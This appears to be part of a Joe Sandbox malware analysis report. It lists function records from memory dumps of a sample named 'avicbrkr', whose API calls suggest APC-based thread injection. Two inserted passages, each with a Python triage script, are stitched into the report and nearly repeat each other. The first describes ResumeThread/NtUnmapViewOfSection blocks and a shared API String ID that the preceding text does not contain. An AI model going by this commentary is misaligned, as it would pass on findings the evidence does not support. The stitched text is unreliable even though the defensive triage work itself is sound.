                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                      • String ID:
                      • API String ID: 2780211928-0
                      • Opcode ID: eb21587d1d766b41c202fcec182a14b65f893840ff09eb8613b8e19b9cf41827
                      • Instruction ID: 25917f1f7f7f18cb05cf4f89aa78f2795ac8f72aa7b50341e9994a8cb716f496
                      • Opcode Fuzzy Hash: eb21587d1d766b41c202fcec182a14b65f893840ff09eb8613b8e19b9cf41827
                      • Instruction Fuzzy Hash: AD318271600705AFDB229F25DC56E9A7BACFF19320F00852AF95AD62A0D775EC11CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 00391333
                      • lstrlen.KERNEL32(003914A3,00000001,00000000,00000000,00000000,00000000,00002000,00000000,R9,?,?,?,?,?,?,003914A3), ref: 00391347
                      • memcpy.NTDLL(00000000,?,?), ref: 0039139C
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrlenmemcpymemset$AllocateFree
                      • String ID: R9
                      • API String ID: 320756535-134138977
                      • Opcode ID: e385b007723a1d37d335eda87d95d6bc4f5148f4662f6b67c5a6c0f8170f7839
                      • Instruction ID: 2d3210c0ecc66d6dedb28ed150f1703b23f2e73b13aba5fc8444b218d790bf6a
                      • Opcode Fuzzy Hash: e385b007723a1d37d335eda87d95d6bc4f5148f4662f6b67c5a6c0f8170f7839
                      • Instruction Fuzzy Hash: 8221FAB5900219BFDF12AFA9CC85AEEBBBCFF08340F104469F915E6101E7359A548BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • OpenProcessToken.ADVAPI32(000000FF,00020008,00637614,00000000), ref: 00633E38
                      • CloseHandle.KERNEL32(00637614), ref: 00633EB8
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00633E93
                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00633EA3
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: AuthorityHeap$AllocateCloseCountFreeHandleOpenProcessToken
                      • String ID:
                      • API String ID: 3879210718-0
                      • Opcode ID: 3f4d6b2bc6495443baa15f31283f62275ceb14e713a6978a10adda392949d33b
                      • Instruction ID: dd0b81fc88949d7776b11ceedd99bc7cbaafccec0e6e01c4e2d68d9dc7543acf
                      • Opcode Fuzzy Hash: 3f4d6b2bc6495443baa15f31283f62275ceb14e713a6978a10adda392949d33b
                      • Instruction Fuzzy Hash: 32213C75900219FFEB119FA4DD45EEEBBBAEB49304F1040A6F910A6261C7715F44EFA0
                      Uniqueness

                      Uniqueness Score: -1,00%
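The two blocks above that pair ResumeThread, WaitForSingleObject and SuspendThread with a subcall reaching NtUnmapViewOfSection (one in the 00371000 dump, one in the 00631000 dump), and the block that opens the process's own token and reads its SID sub-authorities, are the kind of API clusters a triager pulls out of an HCA listing by hand. The Python below is an added example, not part of this report or of the Joe Sandbox tooling: it parses function blocks in this page's layout (the "APIs" header, the bulleted `Name.Module(args), ref: addr` lines, the "Part of subcall function" nesting, the Similarity identifiers and the Uniqueness Score with its decimal comma) and flags blocks whose API set covers a rule. The sample text is constructed from trimmed copies of those blocks; the rule names and API groupings in INDICATORS are my own heuristics, not Joe Sandbox signatures.

```python
# Parser and API-cluster triage for Joe Sandbox HCA function blocks (added example).
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: trimmed copies of two blocks from this report, kept in the
# report's own layout (bullets, subcall nesting, Similarity fields, score line).
SAMPLE_REPORT = """\
APIs
• memset.NTDLL ref: 0038D4B2
  • Part of subcall function 0038D2FD: memset.NTDLL ref: 0038D339
• ResumeThread.KERNEL32(?,?,00000004,00000004,?), ref: 0038D53C
• WaitForSingleObject.KERNEL32(00000064), ref: 0038D54A
• SuspendThread.KERNEL32(?), ref: 0038D55D
  • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
  • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
Memory Dump Source
• Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
Similarity
• API String ID: 398184711-0
• Opcode ID: cc6aecec498ca418648717ae93a6550fd0e8466ac2a24fe7393a832b33eaa0db
Uniqueness

Uniqueness Score: -1,00%

APIs
• OpenProcessToken.ADVAPI32(000000FF,00020008,00637614,00000000), ref: 00633E38
• CloseHandle.KERNEL32(00637614), ref: 00633EB8
• GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00633E93
• GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00633EA3
• Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
• Opcode ID: 3f4d6b2bc6495443baa15f31283f62275ceb14e713a6978a10adda392949d33b
"""

# Heuristic API groupings (own assumption, not Joe Sandbox signatures). A block is
# flagged when its API set, subcalls included, contains every name in a rule.
INDICATORS: Dict[str, set] = {
    "suspend-unmap-resume": {"SuspendThread", "NtUnmapViewOfSection", "ResumeThread"},
    "own-token-sid-probe": {"OpenProcessToken", "GetSidSubAuthorityCount", "GetSidSubAuthority"},
    "registry-key-walk": {"RegOpenKeyExA", "RegEnumKeyExA"},
}

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
META_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
SCORE_LINE = re.compile(r"^\s*Uniqueness Score:\s*(?P<num>-?\d+)[,.](?P<frac>\d+)%\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str            # call-site address inside the memory dump
    subcall: str = ""   # callee address when the API is reached through a subcall

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)
    uniqueness: Optional[float] = None

    def api_names(self) -> set:
        return {c.name for c in self.apis}

def parse_report(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per 'APIs' header; API, score and bullet metadata lines are parsed, the rest ignored."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:
            continue
        elif (m := API_LINE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"] or ""))
        elif (m := SCORE_LINE.match(line)):   # the report prints a decimal comma: "-1,00%"
            cur.uniqueness = float(f"{m['num']}.{m['frac']}")
        elif (m := META_LINE.match(line)):
            cur.meta[m["key"]] = m["val"]
    return blocks

def triage(blocks: List[FunctionBlock]):
    """Return (Opcode ID, sorted matched rule names) for every block whose APIs cover a rule."""
    findings = []
    for b in blocks:
        hits = sorted(k for k, needed in INDICATORS.items() if needed <= b.api_names())
        if hits:
            findings.append((b.meta.get("Opcode ID", "?"), hits))
    return findings

if __name__ == "__main__":
    for opcode_id, hits in triage(parse_report(SAMPLE_REPORT)):
        print(opcode_id[:16], ",".join(hits))
```

On a full report, feed the whole disassembly section to parse_report and key findings by Opcode ID. Note that the same routine recovered from two dump offsets keeps its API String ID (398184711-0 for both ResumeThread/SuspendThread blocks above) while its Opcode ID and Instruction ID differ, so group by API String ID when you want to see the same function across injected copies, and by Opcode ID when you want one entry per dump.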

                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0037E3D7
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0037E3F2
                      • GetLastError.KERNEL32 ref: 0037E460
                        • Part of subcall function 0037E2B8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 0037E339
                        • Part of subcall function 0037E2B8: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037E369
                        • Part of subcall function 0037E2B8: memcpy.NTDLL(00000000,?,?), ref: 0037E37A
                      • GetLastError.KERNEL32 ref: 0037E46F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalErrorLastSection$AllocateEnterHeapLeavememcpy
                      • String ID:
                      • API String ID: 2031912846-0
                      • Opcode ID: 3717c1c74f88c8b4000dc021fbf482d8d778c2310b9dfcb23f787fac0905cb24
                      • Instruction ID: 2078e6a5af35d7b5b740c65fa2b943342d13df9f0f42357b1b1289ee00e4dea9
                      • Opcode Fuzzy Hash: 3717c1c74f88c8b4000dc021fbf482d8d778c2310b9dfcb23f787fac0905cb24
                      • Instruction Fuzzy Hash: 15213D76500208EFCB23CFA9DC45A9E7BB8FF48710F158196F95993260CB35E915EB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00377523
                        • Part of subcall function 0037BFC2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 0037BFDE
                        • Part of subcall function 0037BFC2: GetLastError.KERNEL32(?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000,00000000,00000000), ref: 0037BFE9
                        • Part of subcall function 0037BFC2: WaitNamedPipeA.KERNEL32(00002710), ref: 0037C00B
                        • Part of subcall function 0037BFC2: WaitForSingleObject.KERNEL32(00000000), ref: 0037C019
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00377567
                      • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 003775AD
                      • CloseHandle.KERNEL32(?), ref: 003775D0
                        • Part of subcall function 003775E0: GetTickCount.KERNEL32(00000000,00000000,00000000,L"7,00372CFD,00000000), ref: 003775F0
                        • Part of subcall function 003775E0: CreateFileW.KERNEL32(00000000,80000000,00000003,0039D2D8,00000003,00000000,00000000), ref: 0037760D
                        • Part of subcall function 003775E0: GetFileSize.KERNEL32(?,00000000,Local\,00000001), ref: 00377639
                        • Part of subcall function 003775E0: CreateFileMappingA.KERNEL32(00000000,0039D2D8,00000002,00000000,00000000,?), ref: 0037764D
                        • Part of subcall function 003775E0: lstrlen.KERNEL32(?), ref: 00377669
                        • Part of subcall function 003775E0: lstrcpy.KERNEL32(?,?), ref: 00377679
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 00377681
                        • Part of subcall function 003775E0: HeapFree.KERNEL32(00000000,?), ref: 00377694
                        • Part of subcall function 003775E0: CloseHandle.KERNEL32(?), ref: 003776A6
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 003776AE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CreateErrorLast$CloseHandleMappingWaitlstrlen$CountFreeHeapNamedObjectOpenPipeSingleSizeTicklstrcpymemset
                      • String ID:
                      • API String ID: 3418506136-0
                      • Opcode ID: ae2060190c8fd6d13d3523b06ab3ec329ee6373825baaf8875acaea69c511a7c
                      • Instruction ID: 6fcc3b40d1892e35f0562eb7aab42efe4028e9b0bddeadaa6382bbbb42f90ad2
                      • Opcode Fuzzy Hash: ae2060190c8fd6d13d3523b06ab3ec329ee6373825baaf8875acaea69c511a7c
                      • Instruction Fuzzy Hash: AA217771900209EBDF32DF65CC44EEEBBF8EF45364F104626F918A61A0E7358945CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00377955
                      • GetLastError.KERNEL32(?,00000000,00377C1F), ref: 00377986
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00377998
                      • HeapFree.KERNEL32(00000000,00377C1F), ref: 003779AD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$AllocateErrorLast
                      • String ID:
                      • API String ID: 3560806655-0
                      • Opcode ID: 0329f42de0b2e8e07b165425193d429401acddd9a824989d7ecb4f4f52dcc60c
                      • Instruction ID: 6eaec15b56b50dea811d199e1332a1fd203cfc3d743504c31c6c86302114aea2
                      • Opcode Fuzzy Hash: 0329f42de0b2e8e07b165425193d429401acddd9a824989d7ecb4f4f52dcc60c
                      • Instruction Fuzzy Hash: A2117F76506128BBCB236B95DC49CEFBF7EEF46390F114062F609E2160D7364A51EBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetModuleHandleA.KERNEL32(0039E88E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B742
                        • Part of subcall function 00376361: RtlImageNtHeader.NTDLL(?), ref: 00376376
                        • Part of subcall function 00376361: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,0037D9D1,0037D9D1,00000000,?,0037D9D1,00000001,00000000,?,0037D9D1,?,0000005C), ref: 0037643C
                        • Part of subcall function 003723D9: GetCommandLineW.KERNEL32(00000000,5AFF7C2A,5AFF7C2A,00000001,0037B75E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605), ref: 003723E1
                        • Part of subcall function 003723D9: ExitProcess.KERNEL32 ref: 00372454
                      • CreateThread.KERNEL32(00000000,00000000,00376E94,00000000,00000000,?), ref: 0037B777
                      • CloseHandle.KERNEL32(00000000), ref: 0037B782
                      • GetLastError.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B78A
                        • Part of subcall function 00376490: GetModuleHandleA.KERNEL32(0039E065,00000000,0037B7B6,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC), ref: 00376496
                        • Part of subcall function 00376490: TlsAlloc.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003764A2
                        • Part of subcall function 0037B652: CreateToolhelp32Snapshot.KERNEL32 ref: 0037B684
                        • Part of subcall function 0037B652: GetModuleHandleA.KERNEL32(0039E01D,0039F030,00000004,00000000,00000000,00000000,00000000), ref: 0037B69B
                        • Part of subcall function 0037B652: GetProcAddress.KERNEL32(00000000), ref: 0037B6A2
                        • Part of subcall function 0037B652: Thread32First.KERNEL32(?,0000001C), ref: 0037B6B2
                        • Part of subcall function 0037B652: OpenThread.KERNEL32(001F03FF,00000000,00000000,?,0000001C), ref: 0037B6CD
                        • Part of subcall function 0037B652: QueueUserAPC.KERNEL32(0000005C,00000000,00000000), ref: 0037B6DE
                        • Part of subcall function 0037B652: Thread32Next.KERNEL32(?,0000001C), ref: 0037B6EE
                        • Part of subcall function 003784DB: TlsAlloc.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003784F0
                        • Part of subcall function 003784DB: ___HrLoadAllImportsForDll@4.DELAYIMP ref: 00378538
                        • Part of subcall function 003749A8: memcpy.NTDLL(0039C06C,0000005C,00000028,00000000,0039E1BF,0000005C,?,?,?,00000001,0037B7D2,00000000,00000000,?,0037D9D1), ref: 003749DA
                        • Part of subcall function 003749A8: HeapFree.KERNEL32(00000000,0000005C,0039E1BF), ref: 00374A0B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Handle$AllocModule$CreateThreadThread32$AddressCloseCommandDll@4ErrorExitFirstFreeHeaderHeapImageImportsLastLineLoadNextOpenProcProcessQueueSnapshotToolhelp32UserVirtualmemcpy
                      • String ID:
                      • API String ID: 638187754-0
                      • Opcode ID: 7d14e363c15612d00f9e1c1fd4ddf3022e6af2041e3732337ba08b9dba8228fd
                      • Instruction ID: 6e2e2487aca69973f0b781675c749492158d1d1d4e537de8ca1cc3a82b9f0ad1
                      • Opcode Fuzzy Hash: 7d14e363c15612d00f9e1c1fd4ddf3022e6af2041e3732337ba08b9dba8228fd
                      • Instruction Fuzzy Hash: 94119860104690A5C63F33698CCDB7FD5BC9EC0F91725C90EF44EE6960D71D58419663
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 006313BA
                      • GetLastError.KERNEL32 ref: 00631429
                      • HeapFree.KERNEL32(00000000,?), ref: 0063143B
                        • Part of subcall function 0063225F: memset.NTDLL ref: 00632282
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?,00000000,0063244E,CCCCFEEB,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063230D
                        • Part of subcall function 0063225F: WaitForSingleObject.KERNEL32(00000064), ref: 0063231B
                        • Part of subcall function 0063225F: SuspendThread.KERNEL32(?), ref: 0063232E
                        • Part of subcall function 0063225F: GetLastError.KERNEL32(00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063239A
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?), ref: 006323A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread$ErrorLastResumememset$FreeHeapObjectSingleSuspendWait
                      • String ID: D
                      • API String ID: 3474720918-2746444292
                      • Opcode ID: dafe71e294a75c4d87a693e973aeb654311a8de92ad6ccef93490f9838a1a38f
                      • Instruction ID: 4ab3a51d91ddf370173d67ac8527c796d331834319adbf2169456b66bf3e4bb5
                      • Opcode Fuzzy Hash: dafe71e294a75c4d87a693e973aeb654311a8de92ad6ccef93490f9838a1a38f
                      • Instruction Fuzzy Hash: 7C118472901228BFCB11ABE4DC46DDFBFBAEF4A754F104021F604A6121D7715A45CBE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003891B4: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891DA
                        • Part of subcall function 003891B4: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891E2
                        • Part of subcall function 003891B4: GetLastError.KERNEL32(?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 00389220
                        • Part of subcall function 0038A2FC: lstrcmp.KERNEL32(?,00000000), ref: 0038A3B4
                        • Part of subcall function 0038A2FC: lstrlen.KERNEL32(?,00000000,00000000,?), ref: 0038A3BF
                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003887FE
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0038D17F,?,?,00000000), ref: 00388810
                      • ReadFile.KERNEL32(0038D17F,00000000,00000004,?,00000000), ref: 00388828
                      • CloseHandle.KERNEL32(0038D17F), ref: 00388843
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
                      • String ID:
                      • API String ID: 846255529-0
                      • Opcode ID: f88d962e12679c189d829964f2dff19ecba32c5d2b708e0080dfd51e09f2243c
                      • Instruction ID: 25e5ed5fe1f011d5f7269f13e2045d8db6495d9ea8236464e701be104ca7da35
                      • Opcode Fuzzy Hash: f88d962e12679c189d829964f2dff19ecba32c5d2b708e0080dfd51e09f2243c
                      • Instruction Fuzzy Hash: 42118E72600218BBDB22BB65CC89EAFBE6DEF01750F5044A2F905E61A1D7718E40C7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00633B94: GetModuleFileNameW.KERNEL32(00637614,00000000,00000104,00000208,0063618C,0000000C,?,?,00632A29,?,00000001,0063618C,0000000C,00000000), ref: 00633BBA
                        • Part of subcall function 00633B94: GetModuleFileNameA.KERNEL32(00637614,00000000,00000104,00000208,0063618C,0000000C,?,?,00632A29,?,00000001,0063618C,0000000C,00000000), ref: 00633BC2
                        • Part of subcall function 00633B94: GetLastError.KERNEL32(?,?,00632A29,?,00000001,0063618C,0000000C,00000000,?,?,?,00631746), ref: 00633C00
                        • Part of subcall function 006347D2: lstrcmp.KERNEL32(?,00637614), ref: 00634882
                        • Part of subcall function 006347D2: lstrlen.KERNEL32(?,00000000,00000000,006317CE), ref: 0063488D
                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006332C4
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,00631B26,00638451), ref: 006332D6
                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 006332EE
                      • CloseHandle.KERNEL32(?), ref: 00633309
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
                      • String ID:
                      • API String ID: 846255529-0
                      • Opcode ID: a9f00e634837e10115710bf9651e0de113135c8e96d29ca3789ef022cb93e9b5
                      • Instruction ID: 18cc42201472de713f0db4ef59ab70248d05960383802d35c4652be45d0678b7
                      • Opcode Fuzzy Hash: a9f00e634837e10115710bf9651e0de113135c8e96d29ca3789ef022cb93e9b5
                      • Instruction Fuzzy Hash: D9116371A01128BBEB20AB65CD49EEFBE7EEF42750F108025F506E5265D7319F50C6E4
                      Uniqueness

                      Uniqueness Score: -1,00%
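
The record above whose sub-call 0037B652 reaches CreateToolhelp32Snapshot, Thread32First, OpenThread and QueueUserAPC, and the pair of records that share API String ID 846255529 between the 00371000 and 00631000 dumps, are the kind of signal worth pulling out of a report this size mechanically rather than by scrolling. The Python below is an added triage script, not part of the Joe Sandbox report or its IDA plugin: it parses function records in the text form shown on this page, applies a small API-set signature table of my own (the signatures are heuristics I assume for triage, not Joe Sandbox rules), and lists API String IDs that recur at different memory dump offsets, which is how the same code shows up twice when a payload is mapped at two base addresses. The embedded sample is constructed from three records on this page with their argument lists trimmed.

```python
"""Triage helper for Joe Sandbox HCA function records (added example)."""
import re
from collections import defaultdict

# Constructed sample: three records copied from this report, trimmed.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(0039E88E,00000000), ref: 0037B742
  • Part of subcall function 00376361: RtlImageNtHeader.NTDLL(?), ref: 00376376
  • Part of subcall function 00376361: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040), ref: 0037643C
  • Part of subcall function 0037B652: CreateToolhelp32Snapshot.KERNEL32 ref: 0037B684
  • Part of subcall function 0037B652: Thread32First.KERNEL32(?,0000001C), ref: 0037B6B2
  • Part of subcall function 0037B652: OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 0037B6CD
  • Part of subcall function 0037B652: QueueUserAPC.KERNEL32(0000005C,00000000,00000000), ref: 0037B6DE
  • Part of subcall function 0037B652: Thread32Next.KERNEL32(?,0000001C), ref: 0037B6EE
Memory Dump Source
• Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
• API String ID: 638187754-0
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003887FE
• ReadFile.KERNEL32(0038D17F,00000000,00000004,?,00000000), ref: 00388828
• CloseHandle.KERNEL32(0038D17F), ref: 00388843
Memory Dump Source
• Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
• API String ID: 846255529-0
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006332C4
• ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 006332EE
• CloseHandle.KERNEL32(?), ref: 00633309
Memory Dump Source
• Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
• API String ID: 846255529-0
"""

API_RE = re.compile(r"([A-Za-z_][\w@]*)\.([A-Z][A-Z0-9]*)\b")   # Name.MODULE
REF_RE = re.compile(r"ref: ([0-9A-F]{8})")
OFFSET_RE = re.compile(r"Offset: ([0-9A-F]{8})")
APISTR_RE = re.compile(r"API String ID: (\d+-\d+)")

# Heuristic signatures (assumption: my triage rules, not Joe Sandbox's).
# A function matches when its record, sub-calls included, reaches every API.
SIGNATURES = {
    "APC injection candidate": {"CreateToolhelp32Snapshot", "Thread32First",
                                "OpenThread", "QueueUserAPC"},
    "manual PE mapping candidate": {"RtlImageNtHeader", "VirtualAlloc"},
    "code page made writable (hook/patch candidate)": {"GetModuleHandleA",
                                                       "VirtualProtect"},
}


def parse_records(text):
    """Split report text into one dict per 'APIs' record."""
    records, cur, in_apis = [], None, False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"addr": None, "offset": None, "api_string_id": None, "apis": set()}
            records.append(cur)
            in_apis = True
            continue
        if cur is None:
            continue
        if s == "Memory Dump Source":
            in_apis = False
        if in_apis:
            cur["apis"].update(name for name, _dll in API_RE.findall(s))
            m = REF_RE.search(s)
            # First call made by the function itself identifies the record.
            if m and cur["addr"] is None and "Part of subcall" not in s:
                cur["addr"] = m.group(1)
        else:
            m = OFFSET_RE.search(s)
            if m:
                cur["offset"] = m.group(1)
            m = APISTR_RE.search(s)
            if m:
                cur["api_string_id"] = m.group(1)
    return records


def flag_techniques(records):
    """Map record address -> list of signature names whose API set it covers."""
    hits = {}
    for r in records:
        names = [n for n, apis in SIGNATURES.items() if apis <= r["apis"]]
        if names:
            hits[r["addr"]] = names
    return hits


def shared_across_dumps(records):
    """API String IDs that occur at more than one dump offset (duplicated code)."""
    seen = defaultdict(set)
    for r in records:
        if r["api_string_id"] and r["offset"]:
            seen[r["api_string_id"]].add(r["offset"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for addr, names in flag_techniques(recs).items():
        print(addr, "->", ", ".join(names))
    for sid, offs in shared_across_dumps(recs).items():
        print("API String ID", sid, "recurs at offsets", ", ".join(offs))
```

Run it over the full report text instead of SAMPLE to get the same two views for every function; the signature table is the part to grow, and the cross-dump grouping is a quick way to confirm that the 00631000 region is a second copy of the 00371000 code rather than new functionality.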

                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00372A2B
                        • Part of subcall function 00389EF2: RegCloseKey.ADVAPI32(?,00000000), ref: 00389F79
                      • lstrcmpiW.KERNEL32(00001000,?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A61
                      • lstrlenW.KERNEL32(?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A6E
                      • RegCloseKey.ADVAPI32(?,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372AC4
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Close$Openlstrcmpilstrlen
                      • String ID:
                      • API String ID: 1246463283-0
                      • Opcode ID: ffb935db6ea6c051b1d0eca01df2d2fbc916f721d8cbb48f9e318c3022d213b9
                      • Instruction ID: 43944a72a08fc32299ba6bd0ca282d9ff22340611aa5343a996786b7d1d33056
